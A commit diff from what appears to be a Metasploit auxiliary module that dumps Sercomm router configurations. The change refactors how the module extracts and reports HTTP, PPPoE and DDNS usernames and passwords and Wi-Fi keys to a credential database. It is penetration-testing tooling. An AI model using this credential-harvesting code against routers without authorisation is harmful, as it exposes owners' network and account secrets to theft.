Code Review Feedback

Refactored the configuration settings so that creds could be reported to the database more easily, while still being able to print general configuration settings separately.
2014-01-09 10:14:34 -05:00 · 2014-01-09 10:14:34 -05:00 · d9e737c3ab
parent 81adff2bff
commit d9e737c3ab
1 changed files with 48 additions and 18 deletions
--- a/modules/auxiliary/admin/sercomm/sercomm_dump_config.rb
+++ b/modules/auxiliary/admin/sercomm/sercomm_dump_config.rb
@ -31,20 +31,20 @@ class Metasploit3 < Msf::Auxiliary
        ], self.class)
  end

-  Settings = [
-      [/http_username=(\S+)/i, "HTTP Username"],
-      [/http_password=(\S+)/i, "HTTP Password"],
-      [/pppoe_username=(\S+)/i, "PPPOE Username"],
-      [/pppoe_password=(\S+)/i, "PPPOE Password"],
-      [/ddns_service_provider=(\S+)/i, "DynDNS Provider"],
-      [/ddns_user_name=(\S+)/i, "DynDNS Username"],
-      [/ddns_password=(\S+)/i, "DynDNS Password"],
-      [/wifi_ssid=(\S+)/i, "Wifi SSID"],
-      [/wifi_key1=(\S+)/i, "Wifi Key1"],
-      [/wifi_key2=(\S+)/i, "Wifi Key2"],
-      [/wifi_key3=(\S+)/i, "Wifi Key3"],
-      [/wifi_key4=(\S+)/i, "Wifi Key4"]
+  Settings = {
+    'Creds' => [
+      [ 'HTTP Web Management', { 'user' => /http_username=(\S+)/i, 'pass' => /http_password=(\S+)/i } ],
+      [ 'PPPoE', { 'user' => /pppoe_username=(\S+)/i, 'pass' => /pppoe_password=(\S+)/i } ],
+      [ 'DDNS', { 'user' => /ddns_user_name=(\S+)/i, 'pass' => /ddns_password=(\S+)/i } ],
+    ],
+    'General' => [
+      ['Wifi SSID', /wifi_ssid=(\S+)/i],
+      ['Wifi Key 1', /wifi_key1=(\S+)/i],
+      ['Wifi Key 2', /wifi_key2=(\S+)/i],
+      ['Wifi Key 3', /wifi_key3=(\S+)/i],
+      ['Wifi Key 4', /wifi_key4=(\S+)/i]
    ]
+  }

  def run

@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
    print_status("Router configuration dump stored in: #{loot_file}")

    configs = response.split(?\x00)
-    
+
    if (datastore['VERBOSE'])
      vprint_status('All configuration values:')
      configs.sort.each do |i|
@ -80,14 +80,44 @@ class Metasploit3 < Msf::Auxiliary
      end
    end

-    # print some useful data sets
-    Settings.each do |regex|
+    Settings['General'].each do |regex|
      configs.each do |config|
-        if config.match(regex[0])
+        if config.match(regex[1])
          value = $1
-          print_status("#{regex[1]}: #{value}")
+          print_status("#{regex[0]}: #{value}")
        end
      end
    end
+
+    Settings['Creds'].each do |cred|
+      user = nil
+      pass = nil
+
+      # find the user/pass
+      configs.each do |config|
+        if config.match(cred[1]['user'])
+          user = $1
+        end
+        if config.match(cred[1]['pass'])
+          pass = $1
+        end
+      end
+
+      # if user and pass are specified, report on them
+      if user and pass
+        print_status("#{cred[0]}: User: #{user} Pass: #{pass}")
+        auth = {
+          :host => rhost,
+          :port => rport,
+          :user => user,
+          :pass => pass,
+          :type => 'password',
+          :source_type => "exploit",
+          :active => true
+        }
+        report_auth_info(auth)
+      end
+    end
+
  end
 end